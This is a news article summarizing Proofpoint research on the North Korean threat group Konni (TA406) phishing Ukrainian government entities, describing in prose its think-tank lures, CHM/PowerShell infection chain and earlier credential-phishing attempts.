The state-backed North Korean threat group Konni (Opal Sleet, TA406) was observed targeting Ukrainian government entities in intelligence collection operations.
The attackers use phishing emails that impersonate think tanks, referencing important political events or military developments to lure their targets.
Proofpoint researchers who discovered the activity in February 2025 suggest that it’s likely an effort to support the DPRK’s military involvement alongside Russia in Ukraine and evaluate the political status underpinning the conflict.
“Proofpoint assesses TA406 is targeting Ukrainian government entities to better understand the appetite to continue fighting against the Russian invasion and assess the medium-term outlook of the conflict,” explain the researchers.
“North Korea committed troops to assist Russia in the fall of 2024, and TA406 is very likely gathering intelligence to help North Korean leadership determine the current risk to its forces already in the theatre, as well as the likelihood that Russia will request more troops or armaments.”
Attack chain
The malicious emails sent to targets impersonate members of fictitious think tanks, dealing with key issues like recent dismissals of military leaders or presidential elections in Ukraine.
The attackers use freemail services like Gmail, ProtonMail, and Outlook to repeatedly send messages to their targets, urging them to click on the link.
Source: Proofpoint
Doing so takes the victims to a MEGA-hosted download that drops a password-protected .RAR archive (Analytical Report.rar) on their systems, containing a .CHM file with the same name.
Opening that triggers embedded PowerShell that downloads the next-stage PowerShell, which captures reconnaissance info from the infected host, and establishes persistence.
Proofpoint has also seen variants that employ HTML attachments dropping ZIP archives containing benign PDFs and malicious LNK files, leading to PowerShell and VBScript execution.
Source: Proofpoint
Proofpoint could not retrieve the final payload in these attacks, which is believed to be some sort of malware/backdoor that facilitates espionage operations.
The researchers also noted that Konni executed preparational attacks earlier, targeting the same people and attempting to harvest account credentials they could use to hijack accounts.
These attempts involved emails spoofing Microsoft security alerts, claiming “unusual sign-in activity,” and asking the recipient to verify their login on a phishing site at “jetmf[.]com.”
Source: Proofpoint
North Korea’s targeting of Ukrainian government entities adds a new dimension to the country’s already complex cybersecurity battlefield, which has been dominated by relentless Russian state-sponsored attacks since the start of the invasion.
Based on an analysis of 14M malicious actions, discover the top 10 MITRE ATT&CK techniques behind 93% of attacks and how to defend against them.
Source link
-
-
-
-
-
-
-
-
